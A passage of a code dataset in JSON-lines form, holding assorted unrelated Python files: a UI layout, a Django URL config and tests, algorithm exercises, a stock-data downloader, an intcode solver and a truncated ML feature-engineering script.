= Layout([(None, 1), (loot_layout, 3), (None, 1)],\n 'horizontal')\n loot_layout = Layout([(None, 1), (loot_layout, 6), (None, 1)])\n\n right_half = Layout([(mod_info_layout, 7), (loot_layout, 8)])\n\n # combined halves\n layout = Layout([(left_half, 1), (right_half, 1)], 'horizontal')\n\n # Gap at top for information display.\n self._layout = Layout([(None, 1), (layout, 14)], dimensions=SCREEN_SIZE)\n\n def _slot_layout(self, slot_data: SlotHeaderInfo,\n num_rows: int = None) -> Layout:\n \"\"\"Vertical layout storing a single slot's data.\"\"\"\n\n # First row is just basic slot information\n elems: List[Tuple[Any, int]] = [(slot_data, 1)]\n for mod in slot_data.mods:\n elems.append((SlotRowInfo(mod, mod is self._selected_mod), 1))\n\n # Add padding to ensure consistent row sizes\n num_rows = _DEFAULT_ROWS_PER_SLOT if num_rows is None else num_rows\n\n if len(elems) < num_rows:\n elems.append((None, num_rows - len(elems)))\n\n return Layout(elems)\n\n\n_DEFAULT_ROWS_PER_SLOT = 4\n\n\ndef _slot_header(slot: SlotTypes, chassis: Chassis) -> SlotHeaderInfo:\n return SlotHeaderInfo(slot, chassis.slot_capacities[slot],\n chassis.mods_in_slot(slot))\n","sub_path":"src/models/scenes/inventory_scene.py","file_name":"inventory_scene.py","file_ext":"py","file_size_in_byte":8680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39286414","text":"class fPeragaanReimburse:\n def __init__(self,parentForm,FormObj):\n self.form = parentForm\n self.app = parentForm.ClientApplication\n\n def Show(self):\n self.ShowFixedAssetData()\n self.FormContainer.Show()\n\n def bCariClick(self,sender):\n self.ShowFixedAssetData()\n\n def ShowFixedAssetData(self):\n query1 = self.query1\n uipart = self.uipart\n field = uipart.Field or ''\n textcari = uipart.isian or ''\n\n AddParam =''\n if field != '':\n AddParam +=\"and %s LLIKE'%s' \" % (field,textcari)\n\n query1.OQLText = \" Select from reimbursementrealization as RR [ IsAuthorized='F' %s ]\\\n ( EmployeeId, \\\n LEmployee.LIndividu.IndividuName, \\\n LEmployee.LIndividu.AccountNo, \\\n LPlafond.OutPatientPlafond, \\\n LPlafond.InPatientPlafond, \\\n LPlafond.TotalPlafond, \\\n LPlafond.Realization, \\\n reimbursementdate, \\\n realizationvalue, \\\n Nominal, \\\n FinalBalance, \\\n BeginBalance, \\\n ReimbursementRealizationId, \\\n self \\\n );\" % (AddParam)\n query1.DisplayData()\n\n#[reimbursementdate BETWEEN '01/01/2012' AND '01/02/2012']\n\n","sub_path":"dialogs/karyawan/fPeragaanReimburse_intr.py","file_name":"fPeragaanReimburse_intr.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"480171524","text":"\"\"\"searching_algorithms URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom searching_algorithms import views\n\nurlpatterns = [\n path('', views.index_page, name='searching-algorithms'),\n path('dfs/', views.index_page),\n path('bfs/', views.bfs_page),\n path('dijkstra/', views.dijkstra_page),\n path('min-max/', views.min_max_page),\n path('ucs/',views.ucs_page),\n path('puzzle/', views.puzzle_page),\n path('dls/', views.dls_page),\n path('admin/', admin.site.urls),\n]\n","sub_path":"searching_algorithms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"208255496","text":"'''\nGiven a m x n matrix, if an element is 0, set its entire row and column to 0. Do it in-place.\n\nExample 1:\n\nInput: \n[\n [1,1,1],\n [1,0,1],\n [1,1,1]\n]\nOutput: \n[\n [1,0,1],\n [0,0,0],\n [1,0,1]\n]\nExample 2:\n\nInput: \n[\n [0,1,2,0],\n [3,4,5,2],\n [1,3,1,5]\n]\nOutput: \n[\n [0,0,0,0],\n [0,4,5,0],\n [0,3,1,0]\n]\nFollow up:\n\nA straight forward solution using O(mn) space is probably a bad idea.\nA simple improvement uses O(m + n) space, but still not the best solution.\nCould you devise a constant space solution?\n'''\n\ndef set_matrix_zeros(matrix):\n m, n = len(matrix), len(matrix[0])\n\n col_zero = False\n row_zero = False \n for i in range(m):\n if matrix[i][0] == 0:\n col_zero = True\n\n if 0 in matrix[0]: row_zero = True\n\n for i in range(1, m):\n for j in range(1, n):\n if matrix[i][j] == 0:\n matrix[i][0] = 0\n matrix[0][j] = 0\n\n for i in range(1, m):\n for j in range(1, n):\n if matrix[i][0] == 0 or matrix[0][j] == 0:\n matrix[i][j] = 0\n\n if col_zero: \n for i in range(m): matrix[i][0] = 0\n if row_zero: matrix[0] = [0]*n \n\n return matrix ","sub_path":"algorithms/matrix/set_matrix_zeros.py","file_name":"set_matrix_zeros.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"240792672","text":"import datetime\n\nimport pandas as pd\nfrom pytdx.hq import TdxHq_API\nfrom settings import settings\nfrom util import code2market\nfrom util import create_db_engine\nfrom util import find_latest_eod_date\nfrom util import trading_days_after\nfrom pytdx.params import TDXParams\n\ndb_engine = create_db_engine()\n\nstocks = pd.read_sql_query(\n\t\"SELECT code, id, name \"\n\t\"FROM stock \"\n\t\"WHERE ((current_price <> 0 AND latest_year IS NOT NULL AND NOT is_fund) OR (is_fund AND is_interesting))\"\n\t\" AND exchange IN ('SH', 'SZ')\"\n\t# \" AND '601313' < code AND code <= '999999'\"\n\t\" AND NOT is_ignored\"\n\t\" ORDER BY code\",\n\tdb_engine)\nstocks['market'] = stocks['code'].apply(code2market)\n\nminutes_per_trading_day = 240\n\ntoday = datetime.datetime.now().date()\ndefault_latest = today - datetime.timedelta(days=365)\napi = TdxHq_API()\n\nwith api.connect(settings['tdx_host'], settings['tdx_port']):\n\tfor code, market, name, stock_id in stocks[['code', 'market', 'name', 'id']].itertuples(index=False):\n\t\tprint('Updating', code, name, '...')\n\n\t\t# Finding the earliest EOD record for the stock, so we can later determine how many trading days's record to pull from TDX server\n\t\tlatest_dt = find_latest_eod_date(code, db_engine, default_latest)\n\t\tprint('Latest:', latest_dt)\n\n\t\t# Safe way to estimate the number of trading days between the stock's latest EOD record in our DB and current day -\n\t\t# trading_days_after(latest_date, now)\n\n\t\t# Retrieve EOD data from TDX, chopping off parts not needed\n\t\teod = api.to_df(api.get_security_bars(TDXParams.KLINE_TYPE_DAILY, market, code, 0, trading_days_after(latest_dt, today))) \\\n\t\t\t.drop(['vol', 'amount', 'year', 'month', 'day', 'hour', 'minute'], axis=1)\n\t\teod['avg'] = ((eod['open'] + eod['high'] + eod['low'] + eod['close']) * 1000 / 4).astype(int)\n\t\teod['date'] = pd.to_datetime(eod['datetime']).dt.date\n\t\teod['open'] = (eod['open'] * 1000).astype(int)\n\t\teod['high'] = (eod['high'] * 1000).astype(int)\n\t\teod['low'] = (eod['low'] * 1000).astype(int)\n\t\teod['close'] = (eod['close'] * 1000).astype(int)\n\t\teod['stock_id'] = stock_id\n\t\teod = eod.drop(['datetime'], axis=1)\n\t\teod = eod[(eod['date'] > latest_dt)]\n\n\t\t# Save it to DB\n\t\tprint('Inserting EOD ...')\n\t\teod.to_sql('stock_price', db_engine, if_exists='append', index=False)\n\n\t\t# EOM\n\t\t# dt_index = 0\n\t\t# while True:\n\t\t# \tdt_index += 1\n\t\t# \tdf = api.to_df(api.get_security_bars(TDXParams.KLINE_TYPE_1MIN, 1, code, minutes_per_trading_day*dt_index, minutes_per_trading_day))\n\t\t# \tif df.size == 0:\n\t\t# \t\tbreak\n\t\t#\n\t\t# \tdf['datetime'][0]\n\t\t# \tdf['datetime'][minutes_per_trading_day-1]\n\t\t#\n\t\t# \tif iter_date <= latest_dt:\n\t\t# \t\tbreak\n\t\t#\n\t\t# \t# Verify first and last minute line\n\t\t#\n\t\t# print('Inserting EOM ...')\n\n\tapi.disconnect()\n\nprint('Done updating stock EOD records.')\n","sub_path":"michael/findata/extract_eod.py","file_name":"extract_eod.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"477559036","text":"# author by claire\nimport re\n\n\nfrom class27_20200208_api_framework_v4.common.requests_handler import RequestsHandler\nfrom class27_20200208_api_framework_v4.config.setting import config\nfrom class27_20200208_api_framework_v4.middlerware.read_yml import yaml_data\nfrom jsonpath import jsonpath\n\nfrom class30_20200215_api_framework_v7.common.db_handler import DBHandler\n\n\ndef login():\n req = RequestsHandler()\n res = req.visit(config.host+'/member/login',\n 'post',\n json=yaml_data['user'],\n headers={\"X-Lemonban-Media-Type\":\"lemonban.v2\"})\n return res\n\nclass Context:\n # token = ''\n # member_id = None\n # loan_id = None\n def __init__(self):\n self.db = DBHandler(host=yaml_data['database']['host'],\n port=yaml_data['database']['port'],\n user=yaml_data['database']['user'],\n password=yaml_data['database']['password'],\n database=yaml_data['database']['database'],\n charset=yaml_data['database']['charset'])\n\n\n @property\n def loan_id(self):\n loan_id = self.db.query('select id from loan where status = %s;', args=[2, ])\n self.db.close()\n return loan_id\n\n def wrong_loan_id(self):\n wrong_loan_id = self.db.query('select id from loan where status != %s;', args=[2, ])\n self.db.close()\n return wrong_loan_id\n\n @property\n def token(self):\n data = login()\n token = jsonpath(data, '$..token')[0]\n token_type = jsonpath(data, '$..token_type')[0]\n token = \" \".join([token_type, token])\n return token\n\n @property\n def member_id(self):\n data = login()\n member_id = jsonpath(data, '$..id')[0]\n return member_id\n\n @property\n def wrong_member_id(self):\n wrong_member_id = Context.member_id + 1\n return wrong_member_id\n\n\ndef replace_label(target):\n re_pattern = r'#(.*?)#'\n while re.findall(re_pattern, target):\n key = re.search(re_pattern, target).group(1)\n target = re.sub(re_pattern, str(getattr(Context(), key)), target, 1)\n return target\n\n\ndef save_token():\n data = login()\n token = jsonpath(data, '$..token')[0]\n member_id = jsonpath(data, '$..id')[0]\n token_type = jsonpath(data, '$..token_type')[0]\n\n token = \" \".join([token_type, token])\n\n Context.token = token\n Context.member_id = member_id\n\n return token\n return {\"token\": token, \"member_id\": member_id}\n\nif __name__ == '__main__':\n # data = save_token()\n # print(data)\n a = getattr(Context(), 'member_id')\n print(a)\n\n","sub_path":"python 25 code/class30_20200215_api_framework_v7/middlerware/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"288800028","text":"# Python Challenge Sudoku Solver - 4 by 4 Sudoku Solver\n# Alden Dent\n# 9/21/21\n\nimport numpy\n\nblankR1 = input(\"Enter the first row: \")\nblankR2 = input(\"Enter the second row: \")\nblankR3 = input(\"Enter the third row: \")\nblankR4 = input(\"Enter the fourth row: \")\nallPossibleRows = numpy.empty(24, dtype = object)\npossibleR1 = numpy.empty(0, dtype = object)\npossibleR2 = numpy.empty(0, dtype = object)\npossibleR3 = numpy.empty(0, dtype = object)\npossibleR4 = numpy.empty(0, dtype = object)\npossibleRowsColumns = numpy.empty((0, 4), dtype = object)\n\ndef uniqueCharacters(numberSet):\n for number in numberSet:\n if numberSet.count(number) != 1:\n return False\n return True\n\ndef uniqueColumns(row1, row2, row3, row4):\n for num in range(len(row1)):\n if not uniqueCharacters(row1[num] + row2[num] + row3[num] + row4[num]):\n return False\n return True\n\ndef matchesBlank(blankRow, filledRow):\n return blankRow[0] in (\"0\", filledRow[0]) and blankRow[1] in (\"0\", filledRow[1]) and blankRow[2] in (\"0\", filledRow[2]) and blankRow[3] in (\"0\", filledRow[3])\n\ndef drawBoard(row1, row2, row3, row4):\n print(row1)\n print(row2)\n print(row3)\n print(row4)\n\nfor i in range(1, 5):\n for j in range(1, 5):\n for k in range(1, 5):\n for l in range(1, 5):\n testRow = str(i) + str(j) + str(k) + str(l)\n if uniqueCharacters(testRow):\n if matchesBlank(blankR1, testRow):\n possibleR1 = numpy.append(possibleR1, testRow)\n if matchesBlank(blankR2, testRow):\n possibleR2 = numpy.append(possibleR2, testRow)\n if matchesBlank(blankR3, testRow):\n possibleR3 = numpy.append(possibleR3, testRow)\n if matchesBlank(blankR4, testRow):\n possibleR4 = numpy.append(possibleR4, testRow)\n\nfor row1 in possibleR1:\n for row2 in possibleR2:\n for row3 in possibleR3:\n for row4 in possibleR4:\n if uniqueColumns(row1, row2, row3, row4):\n arrayToAppend = numpy.reshape(numpy.array([[row1], [row2], [row3], [row4]]), (1, 4))\n possibleRowsColumns = numpy.append(possibleRowsColumns, arrayToAppend, axis = 0)\n\nprint(\"Empty board is:\")\ndrawBoard(blankR1, blankR2, blankR3, blankR4)\n\nfor solution in possibleRowsColumns:\n print(\"\")\n print(\"A solution is\")\n drawBoard(solution[0], solution[1], solution[2], solution[3])\n","sub_path":"Python/sudoku_solver_4x4.py","file_name":"sudoku_solver_4x4.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"599851963","text":"from django.test import TestCase\nfrom http import HTTPStatus\nfrom shops.models import City, Street, Shop\nfrom shops.config import STREET, CITY, STATE_SHOP, SHOP_OPEN, SHOP_CLOSED\nfrom django.contrib.auth import get_user_model\nfrom rest_framework.test import APITestCase, APIClient\n\n\nclass CityViewTest(TestCase):\n\n def test_get_city_list(self):\n response = self.client.get('/city')\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n\nclass StreetViewTest(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.city_id = City.objects.create(name='city_test').id\n\n def test_get_street_list(self):\n response = self.client.get(f'/{self.city_id}/street')\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n\nclass ShopListCreateViewTest(APITestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.city_obj = City.objects.create(name='city_test')\n cls.city_id = cls.city_obj.id\n cls.street_obj = Street.objects.create(name='street_test', city=cls.city_obj)\n cls.street_id = cls.street_obj.id\n\n cls.username = 'test_username'\n cls.password = 'test_password'\n cls.user_obj = get_user_model().objects.create(username=cls.username, password=cls.password)\n cls.user_id = cls.user_obj.id\n\n cls.client = APIClient()\n cls.token = cls.client.post('/auth/authorization',\n {'username': cls.username,\n 'password': cls.password}).json()['token']\n\n from datetime import time\n from random import randint\n for i in range(10):\n opening_hour, opening_min, opening_sec = randint(0, 23), randint(0, 59), randint(0, 59)\n closing_hour, closing_min, closing_sec = randint(0, 23), randint(0, 59), randint(0, 59)\n Shop.objects.create(name=f'shop_{i}',\n user=cls.user_obj,\n city=cls.city_obj,\n street=cls.street_obj,\n house=i,\n opening_time=time(opening_hour, opening_min, opening_sec),\n closing_time=time(closing_hour, closing_min, closing_sec)\n )\n\n def test_get_shop_list_without_params(self):\n response = self.client.get('/shop')\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_get_shop_list_with_city(self):\n response = self.client.get('/shop', {CITY: self.city_id})\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_get_shop_list_with_city_and_street(self):\n response = self.client.get('/shop', {CITY: self.city_id,\n STREET: self.street_id})\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_get_shop_list_with_street_and_without_city(self):\n response = self.client.get('/shop', {STREET: self.street_id})\n self.assertEqual(response.status_code, HTTPStatus.BAD_REQUEST)\n\n def test_get_shop_list_with_city_and_street_state(self):\n response_open = self.client.get('/shop', {CITY: self.city_id,\n STREET: self.street_id,\n STATE_SHOP: SHOP_OPEN})\n response_closed = self.client.get('/shop', {CITY: self.city_id,\n STREET: self.street_id,\n STATE_SHOP: SHOP_CLOSED})\n\n self.assertEqual(response_open.status_code, HTTPStatus.OK)\n self.assertEqual(response_closed.status_code, HTTPStatus.OK)\n\n def test_create_shop_unauthorized(self):\n response = self.client.post('/shop', {'name': 'shop_name',\n 'user': self.user_id,\n 'city': self.city_id,\n 'street': self.street_id,\n 'house': 42,\n 'opening_time': (8, 0, 0),\n 'closing_time': (21, 0, 0)})\n\n self.assertEqual(response.status_code, HTTPStatus.UNAUTHORIZED)\n\n def test_create_shop_authorized(self):\n self.client.credentials(HTTP_AUTHORIZATION=f'JWT {self.token}')\n\n response = self.client.post('/shop', {'name': 'shop_name',\n 'user': self.user_id,\n 'city': self.city_id,\n 'street': self.street_id,\n 'house': 42,\n 'opening_time': '08:00:00',\n 'closing_time': '21:00:00'})\n\n self.assertEqual(response.status_code, HTTPStatus.OK)","sub_path":"rest_api/shops/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294871066","text":"# -*- coding: utf-8 -*-\n\nimport json\n\n\nclass FunctionMeta:\n def __init__(self, invoked_function_id, function_name, function_version, function_handler, memory_size, timeout):\n self.invoked_function_id = invoked_function_id\n self.function_name = function_name\n self.function_version = function_version\n self.function_handler = function_handler\n self.memory_size = memory_size\n self.timeout = timeout\n\n def to_dict(self):\n return {\n \"id\": self.invoked_function_id,\n \"name\": self.function_name,\n \"version\": self.function_version,\n \"handler\": self.function_handler,\n \"memory\": self.memory_size,\n \"timeout\": self.timeout,\n }\n\n\nclass FCContext:\n def __init__(self, request_id, function_meta, log_set, log_topic):\n self.request_id = request_id\n self.function = function_meta\n self.log_set = log_set\n self.log_topic = log_topic\n\n def to_json(self):\n return json.dumps({\"requestId\": self.request_id,\n \"function\": self.function.to_dict(),\n \"logSet\": self.log_set,\n \"logTopic\": self.log_topic,\n })\n","sub_path":"commands/local/image/python36/server/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"545713838","text":"import struct\nimport collections\nimport pudb as db\n\n\ndef integer_to_bitstring(num):\n s = collections.deque()\n remain = int(num)\n\n while remain > 0:\n bit = remain % 2\n s.appendleft( str(bit) )\n remain //= 2\n\n return ''.join(s)\n\n\ndef fraction_to_bitstring(num, max_length):\n # return a bitstring slightly longer than the max so you can detect overflow\n count = max_length + 2\n s = ''\n carry = num\n\n while carry != 0 and count > 0:\n carry *= 2\n s += '0' if carry < 1 else '1'\n count -= 1\n\n if carry >= 1:\n carry -= 1\n\n return s\n\n\ndef number_to_bytes(num):\n # assumes little-endian\n # displays as big-endian for easier human understanding\n bytes_array = struct.pack('f', num)\n s = ''\n\n for by in bytes_array[::-1]:\n s += bin(by)[2:].rjust(8, '0') + '\\n'\n\n return s.rstrip('\\n')\n\n\ndef float_bitstring(num):\n exp_length = 8\n mantissa_length = 23\n\n integer = int(abs(num))\n fraction = abs(num) - integer\n bs_int = integer_to_bitstring(integer)\n bs_frac = fraction_to_bitstring(fraction, mantissa_length)\n\n basis = 127\n bs_sign = '1' if num < 0 else '0'\n exp_int = basis + (len(bs_int) - 1) * (-1 if bs_sign == '1' else 1)\n bs_exp = integer_to_bitstring(exp_int)\n bs_mantissa = bs_int[1:] + bs_frac\n\n if len(bs_mantissa) > mantissa_length:\n raise Exception(\"ERROR: Number can't be accurately represented as float\")\n\n float_s = bs_sign\n float_s += bs_exp.rjust(exp_length, '0')\n float_s += bs_mantissa.ljust(mantissa_length, '0')\n\n s = ''\n for i in range(0, 8 * 4, 8):\n s += f\"{float_s[i:i + 8]}\" + \"\\n\"\n s += f\"bs_sign: {float_s[0]}, exponent: {float_s[1:9]}, mantissa: {float_s[9:]}\"\n\n return s\n\n\nif __name__ == '__main__':\n # Insert M into N starting at indeces i - j\n print('Insert M bit sequence into N bit sequence')\n M = 0b10011\n N = 0b10000000010\n i = 2\n j = 6\n\n count = N << 1\n mask = ~0\n\n # while count > 1:\n # mask <<= 1\n # count >>= 1\n # mask -= 1\n\n # mask >>= j\n mask <<= j\n mask |= (1 << i) - 1\n\n ans = N & mask | (M << i)\n print(bin(N), bin(mask), bin(ans))\n\n # Represent a decimal as a float\n print()\n print('Decimal number to float representation')\n num = 15.625\n print('number:', num)\n print('\\tto array of bytes:')\n print(number_to_bytes(num))\n print('\\tto float:')\n print(float_bitstring(num))\n num = -num\n print('number:', num)\n print('\\tto array of bytes:')\n print(number_to_bytes(num))\n print('\\tto float:')\n print(float_bitstring(num))\n\n # Flip 0 that produces longest sequence of 1's\n print()\n print(\"Flip 0 producing longest sequence of 1's\")\n num = 1775\n bitstring = bin(num)[2:]\n # using strings\n l = bitstring.split('0')\n print(l)\n\n length = 0\n for a, b in zip(l[0:], l[1:]):\n temp = len(a) + len(b)\n\n if temp > length:\n length = temp\n\n length += 1\n print('bitstring:', bitstring, 'length:', length)\n\n","sub_path":"other/bitwise.py","file_name":"bitwise.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359880906","text":"# AoC December 2nd Part 1\nfile_path = r\"input.txt\"\n\nopcodes = open(file_path, \"r\").read().split(\",\")\nopcodes = list(map(int, opcodes))\n\nintput = 1\n\ndef parameter_mode(opcodes, instruction, idx):\n instruction = list(str(instruction))\n \n paramter_modes = ([0]*(5-len(instruction))) + instruction\n \n param1_value = opcodes[idx + 1] if int(paramter_modes[2]) == 0 else (idx + 1)\n param2_value = (opcodes[idx + 2] if int(paramter_modes[1]) == 0 else (idx + 2))\n param3_value = (opcodes[idx + 3] if int(paramter_modes[0]) == 0 else (idx + 3))\n\n return param1_value, param2_value, param3_value\n\nidx = 0\nwhile idx < len(opcodes):\n instruction = opcodes[idx]\n opcode = int(str(instruction)[-1])\n param1, param2, param3 = parameter_mode(opcodes, instruction, idx)\n\n if opcode == 1:\n opcodes[param3] = opcodes[param1] + opcodes[param2]\n idx += 4\n \n if opcode == 2:\n opcodes[param3] = opcodes[param1] * opcodes[param2]\n idx += 4\n\n if opcode == 3:\n opcodes[param1] = intput\n idx += 2\n\n if opcode == 4 or opcode == 99:\n if opcodes[param1] != 0 and opcodes[idx + 2] == 99:\n print(f\"Diagnostic tests succeed, final output = {opcodes[param1]}\")\n break\n elif opcodes[param1] != 0 and opcodes[idx + 2] != 99:\n print(f\"Diagnostic tests failed, output = {opcodes[param1]}\")\n break\n else:\n print(f\"Diagnostic test succeed, output = {opcodes[param1]}\")\n idx += 2\n\n if opcode == 5: \n if opcodes[param1] != 0:\n idx = opcodes[param2]\n else:\n idx += 3\n \n if opcode == 6:\n if opcodes[param1] == 0:\n idx = opcodes[param2]\n else:\n idx += 3\n\n if opcode == 7:\n if opcodes[param1] < opcodes[param2]:\n opcodes[param3] = 1\n else:\n opcodes[param3] = 0\n idx += 4 \n\n if opcode == 8:\n if opcodes[param1] == opcodes[param2]:\n opcodes[param3] = 1\n else:\n opcodes[param3] = 0\n idx += 4 \n\n\n","sub_path":"2019/Day07/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"287489321","text":"def fillGlass(dpG, k, pos):\n i = 0\n dpG[i][i // 2] = k\n while i < pos[0] and dpG[i][i // 2] > 1:\n dpG[i + 1][0] = max((dpG[i][0] - 1) / 2, 0)\n for idx in range(1, i // 2 + 1):\n dpG[i + 1][idx] = max((dpG[i][idx - 1] - 1) / 2, 0) + max(\n (dpG[i][idx] - 1) / 2, 0)\n if i % 2 == 1:\n dpG[i + 1][(i + 1) // 2] = max(dpG[i][i // 2] - 1, 0)\n for idx in range((i // 2) + 1):\n dpG[i][idx] = min(1, dpG[i][idx])\n i += 1\n if pos[1] > pos[0] // 2:\n pos = (pos[0], pos[0] - pos[1])\n # print('\\n'.join(list(map(str, dpG))))\n return min(dpG[pos[0]][pos[1]], 1)\n\n\nt = int(input())\nfor i in range(t):\n k = int(input())\n i = int(input())\n j = int(input())\n dpG = [[0] * ((c + 1) // 2) for c in range(1, k + 1)]\n print('{0:.6f}'.format(fillGlass(dpG, k, (i - 1, j - 1))))\n","sub_path":"interview/07_recursion/05_overflow.py","file_name":"05_overflow.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"201996113","text":"from MLFE import load\nfrom MLFE import Model\nfrom MLFE import Buffer\nfrom MLFE import Env\nfrom MLFE import updateTargetGraph\nfrom MLFE import updateTarget\nfrom sklearn.model_selection import StratifiedKFold,KFold\nfrom sklearn.linear_model import LogisticRegression,Lasso\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom cleanlab.pruning import get_noise_indices\nfrom sklearn.metrics import matthews_corrcoef\nfrom utils import *\nfrom args import args\nimport tensorflow as tf\nimport os\nimport numpy as np\nfrom sklearn import metrics\nimport tqdm\nimport copy\nimport warnings\nimport math\n\nwarnings.filterwarnings('ignore')\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"#args.cuda\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\ntf_config = tf.ConfigProto()\ntf_config.gpu_options.per_process_gpu_memory_fraction = 0.1 # 分配10%\n\n'''\n 单智能体\n CAFEM网络\n'''\n\n\ndef main(ii):\n opt_type= 'o1'\n opt_size = 9 if opt_type =='o1' else 5\n qsa_size = 100\n input_size = 400\n buffer_size = 2000\n seed = 3\n\n file_path = 'seed.txt' # 随机种子\n file_obj = open(file_path, 'a')\n file_obj.writelines(str(seed))\n file_obj.write(\"\\n\")\n file_obj.close()\n\n num_epochs = 50000\n n_jobs = 1\n tau = 0.05\n gamma = 0.9\n epsilon = 1\n batch_size = 100\n\n save_model = True\n train = True\n test = True\n out_dir = 'D:/FEL实验/1226/CAFEM-master1/src/out/ant-1-4/safem'+str(ii)\n model_dir = 'D:/FEL实验/1226/CAFEM-master1/src/out/ant-1-4/safem_model'+str(ii)\n if not os.path.isdir('D:/FEL实验/1226/CAFEM-master1/src/out/ant-1-4'):\n os.mkdir('D:/FEL实验/1226/CAFEM-master1/src/out/ant-1-4')\n if not os.path.isdir(model_dir):\n os.mkdir(model_dir)\n if not os.path.isdir(out_dir):\n os.mkdir(out_dir)\n\n did = 1480\n f_dataset = \"D:/FEL实验/1226/CAFEM-master1/promise1/ant-1.4-train\"+str(ii)+\".arff\"\n dataset, tasktype = load(f_path=f_dataset)\n f_dataset1 = \"D:/FEL实验/1226/CAFEM-master1/promise1/ant-1.4-test\"+str(ii)+\".arff\"\n dataset_test, tasktype = load(f_path=f_dataset1)\n\n\n globalbuff = Buffer(buffer_size)\n if train:\n\n\n modelNetwork = Model(opt_size=opt_size, input_size=input_size, name=\"model\", maml=False)\n targetNetwork = Model(opt_size=opt_size, input_size=input_size, name=\"target\", maml=False)\n\n perf = 0\n pretransform = []\n with tf.Session(config=tf_config) as sess:\n saver = tf.train.Saver()\n\n saver.restore(sess, model_dir+ \"/model.ckpt\")\n\n\n\n pretransform_test = []\n\n for fid in tqdm.tqdm(range(dataset.shape[1] - 1), total=dataset.shape[1] - 1):\n env_test = Env(dataset, feature=fid, opt_type=opt_type,tasktype=tasktype,\n random_state=seed, pretransform=pretransform_test, n_jobs=n_jobs,\n evaluatertype='rf')\n\n s = np.copy(env_test.state)\n act_mask = np.copy(env_test.action_mask)\n Q = sess.run(modelNetwork.Q_, feed_dict={modelNetwork.inputs: [s]})\n action = np.ma.masked_array(Q, mask=act_mask).argmax()\n s_next, reward = env_test.step(action)\n\n pretransform_test.append((fid, '_'.join(env_test.best_seq)))\n\n f = open(os.path.join(out_dir, \"test_succeed_feat.csv\"), 'a')\n for val in pretransform_test:\n f.write(\"%d,%s\\n\" % (val[0], val[1]))\n f.close()\n\n dataset1 = np.vstack((dataset, dataset_test))\n env1 = Env(dataset1, feature=0, opt_type=opt_type,tasktype=tasktype,\n random_state=seed, pretransform=pretransform_test, n_jobs=n_jobs, evaluatertype='rf')\n dataset1_ = copy.deepcopy(env1.origin_dataset)\n print('dataset1_:', env1.origin_dataset.shape[1] - 1)\n kk = dataset.shape[0]\n X_train1, X_test1 = dataset1_[0:kk, 0:-1], dataset1_[kk:, 0:-1]\n y_train1, y_test1 = dataset1_[0:kk, -1], dataset1_[kk:, -1]\n rf1 =LogisticRegression(solver='liblinear',random_state = seed)\n rf1.fit(X_train1, y_train1)\n pre = rf1.predict(X_test1)\n final_pfm = metrics.f1_score(y_test1, pre, pos_label=1, average=\"binary\")\n f = open(os.path.join(out_dir, \"test_succeed.csv\"), 'a')\n f.write(\"%d,%.6f\\n\" % (ii, final_pfm))\n f.close()\n\n mcc = matthews_corrcoef(y_test1, pre)\n f = open(os.path.join(out_dir, \"test_mcc.csv\"), 'a')\n f.write(\"%d,%.6f\\n\" % (ii, mcc))\n f.close()\n\n prob = rf1.predict_proba(X_test1)\n thresholds = metrics.roc_auc_score(y_test1, prob[:, -1])\n f = open(os.path.join(out_dir, \"test_auc.csv\"), 'a')\n f.write(\"%d,%.6f\\n\" % (ii, thresholds))\n f.close()\n\n\n for act in pretransform_test:\n print(act)\n\n\n tf.reset_default_graph()\n\n\nif __name__ == \"__main__\":\n for ii in range(5):\n 